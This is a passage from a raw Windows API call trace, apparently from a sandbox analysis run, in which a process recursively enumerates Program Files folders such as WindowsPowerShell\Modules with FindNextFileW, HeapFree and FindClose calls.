hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0172.973] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe52bf368, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xe52bf368, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows Multimedia Platform", cAlternateFileName="WINDOW~3")) returned 1 [0172.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0172.973] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa91c8710, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bb043c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows NT", cAlternateFileName="WINDOW~4")) returned 1 [0172.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0172.973] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47cb7852, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xbe78b154, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x47cb7852, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x448600, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wordpad.exe", cAlternateFileName="")) returned 1 [0172.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.973] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa9257555, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService", cAlternateFileName="TABLET~1")) returned 1 [0172.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0172.974] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b88afa, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x68b88afa, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x68b88afa, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa0800, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TableTextService.dll", cAlternateFileName="")) returned 1 [0172.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.974] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa9257555, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService", cAlternateFileName="TABLET~1")) returned 0 [0172.974] FindClose (in: hFindFile=0x728048 | out: hFindFile=0x728048) returned 1 [0172.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0172.976] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x9bdfed90, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x9bdfed90, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows Photo Viewer", cAlternateFileName="WI8A19~1")) returned 1 [0172.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.977] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9550fd74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9550fd74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9550fd74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x19940, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe", cAlternateFileName="")) returned 1 [0172.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0172.977] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe623e79b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xe623e79b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0172.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0172.979] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa92acc65, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bb043c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows Security", cAlternateFileName="WIDB62~1")) returned 1 [0172.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0172.979] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5845b6dc, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x5845b6dc, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x5845b6dc, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="manifest.json", cAlternateFileName="")) returned 1 [0172.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.980] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa92ad688, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BrowserCore", cAlternateFileName="BROWSE~1")) returned 0 [0172.980] FindClose (in: hFindFile=0x728048 | out: hFindFile=0x728048) returned 1 [0172.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0172.981] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe52e5526, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xe52e5526, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0172.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.982] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa92aff0a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bb043c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shared Gadgets", cAlternateFileName="SHARED~1")) returned 1 [0172.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.982] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa92aff0a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bb043c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shared Gadgets", cAlternateFileName="SHARED~1")) returned 0 [0172.982] FindClose (in: hFindFile=0x728048 | out: hFindFile=0x728048) returned 1 [0172.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0172.982] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x8da88b6d, ftLastAccessTime.dwHighDateTime=0x1d3274e, ftLastWriteTime.dwLowDateTime=0x8da88b6d, ftLastWriteTime.dwHighDateTime=0x1d3274e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="WindowsApps", cAlternateFileName="WI7DB9~1")) returned 1 [0172.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0172.983] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb502b1c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 1 [0172.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0172.983] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb502d74d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Schema", cAlternateFileName="")) returned 1 [0172.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0172.983] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb502d74d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Schema", cAlternateFileName="")) returned 0 [0172.983] FindClose (in: hFindFile=0x728308 | out: hFindFile=0x728308) returned 1 [0172.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.983] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb507390a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Modules", cAlternateFileName="")) returned 1 [0172.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.984] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e1d6b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a54419a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Simple", cAlternateFileName="")) returned 1 [0172.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.985] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e1d6b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a54419a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Simple", cAlternateFileName="")) returned 0 [0172.985] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0172.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0172.985] FindNextFileW (in: hFindFile=0x727748, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96e3f39a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96e3f39a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96e3f39a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc4a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.PowerShell.Operation.Validation.Format.ps1xml", cAlternateFileName="")) returned 1 [0173.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0173.129] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e65b3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a54419a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Simple", cAlternateFileName="")) returned 0 [0173.130] FindClose (in: hFindFile=0x727f48 | out: hFindFile=0x727f48) returned 1 [0173.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.130] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e60a0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Diagnostics", cAlternateFileName="DIAGNO~1")) returned 0 [0173.130] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0173.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0173.130] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e6b0e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Example2.Diagnostics", cAlternateFileName="EXAMPL~2.DIA")) returned 1 [0173.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0173.132] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e7ae8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a56a3f4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Simple", cAlternateFileName="")) returned 0 [0173.132] FindClose (in: hFindFile=0x727888 | out: hFindFile=0x727888) returned 1 [0173.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0173.132] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96e3f39a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96e3f39a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96e3f39a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x243, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Example2.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0173.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.132] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e6ff3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a56a3f4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.1", cAlternateFileName="103623~1.1")) returned 0 [0173.132] FindClose (in: hFindFile=0x727f48 | out: hFindFile=0x727f48) returned 1 [0173.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0173.132] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e804c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Example3.Diagnostics", cAlternateFileName="EXAMPL~3.DIA")) returned 1 [0173.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0173.133] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e907e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a56a3f4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Simple", cAlternateFileName="")) returned 0 [0173.133] FindClose (in: hFindFile=0x727c48 | out: hFindFile=0x727c48) returned 1 [0173.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0173.133] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e8b3f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Diagnostics", cAlternateFileName="DIAGNO~1")) returned 0 [0173.133] FindClose (in: hFindFile=0x727f48 | out: hFindFile=0x727f48) returned 1 [0173.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.133] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e955d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.0.1", cAlternateFileName="20519B~1.1")) returned 1 [0173.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0173.133] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50ea096, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a56a3f4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Simple", cAlternateFileName="")) returned 0 [0173.134] FindClose (in: hFindFile=0x727588 | out: hFindFile=0x727588) returned 1 [0173.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0173.134] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e9b5b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Diagnostics", cAlternateFileName="DIAGNO~1")) returned 0 [0173.134] FindClose (in: hFindFile=0x727f48 | out: hFindFile=0x727f48) returned 1 [0173.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.134] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e955d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.0.1", cAlternateFileName="20519B~1.1")) returned 0 [0173.134] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0173.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0173.134] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50e804c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, 